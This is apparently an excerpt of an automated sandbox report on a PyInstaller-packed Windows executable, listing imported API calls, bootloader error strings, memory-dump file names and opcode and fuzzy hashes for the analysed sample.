• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58B6
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58CF
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58E1
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58FD
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED590F
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED592B
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED593D
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5959
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED596B
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5987
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5999
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED59B5
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED59C7
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: e33f6a3009816e3b3d5cd57f177aaf321020c512ca1b45e661f61a2a33ef5d31
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: 7C22B566A39F47C5FA84BB55B82057423A1EF88744F6454B9C85E822B0FF3CB188FA14
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction ID: cf2770487e1234ec44757334ece3c32facafec0d435b1ac96b1089b2e334007d
• Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction Fuzzy Hash: 81313373619B8189EBA09F64E8803EE7364FB84744F444439DA4D87BA5EF3CD548DB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA979
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA99E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CA4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction ID: 2ea0de5c1396435eefc315366a3c5b596948944cbb0b1f8305bf955c7f59c302
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D12363A2828286E7A4FF21E8501B92751FF94784F41817EEE0DC76A6EF3CE541DB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction ID: 759933061a3edcf233720f7591b4b4f66ffe811888fea1985be1a0af5e8c6ccc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92318837628F8189E760DF25E8402AE73A4FB84754F540179EA9D87B65EF3CD145CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction ID: edf9fc3ce711f272e282dd1079321189cd236e8647c2bf17a826b26ca683f037
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACB1B723B3C69A81EAA1AB21F4101BD6350EB44BE4F44517AEF5D87BE5EE3CE441DB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF564C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                                          • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction ID: d61ec9e0fa794d2f44115e73846f00e2dfcd64ce800a22537beb987f8174e5fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C251C873A2868286E7A0FF21E8915B96760FB58784F4151BDDA4DC77B6DF3CE4009B40
                                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
APIs
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
APIs
  • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF67AED88A7,?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED821C
  • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
Strings
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
APIs
Strings
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
APIs
Strings
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction ID: a65f9136d1a16c7140162ca9e377ad537fb37e2896b002774264db9813120844
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21D323B28A42C6EB816B7AB8541796350EF88B91F5842B4DE6DC33F4EE2CD584D700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: dd4dde16f49b3cd1f81474439cfa99d0b263006a46247afb9f0efd89d0bf18e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3312B373F2C14386FB207B14E1542B97792FB40750F844575E68A876E8DF3DE990AB02
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction ID: 9084b6d6669bec35a4d674902e9ef59caaa80b8d4c7509b288e5594446f99566
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70128163E2C14386FB20BA55E4546BD73A1FBA0754F8840B5E699C7AE4DF7CE4C0AB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                          • Instruction ID: 68600170bdbe9025efe8ff0432ae1c7f95dc6771ec476c916f553586997551d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6741A163B2C65286FA10FB22A8006B96395FF84BC4F6444B5ED4D877A6DE3CE505E740
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                          • Instruction ID: 66be77be411398093f21bb916bc5d6cc1e10f5c733e724d9ff00923978f0fc58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38416F23B2868289FB10FB31A5405B96390FF84794F5449B6ED4D87BB5DE3CE541EB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction ID: decb345baaab07e76e92f07ece6ea74d53ec13f30e9aaf093586f3ea5cb877ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D16D33A28741CAEB24EB25D4453AD37A0FB85798F200175EE8D97BA9DF38E581D700
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
• MessageBoxW.USER32 ref: 00007FF67AED2D99
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
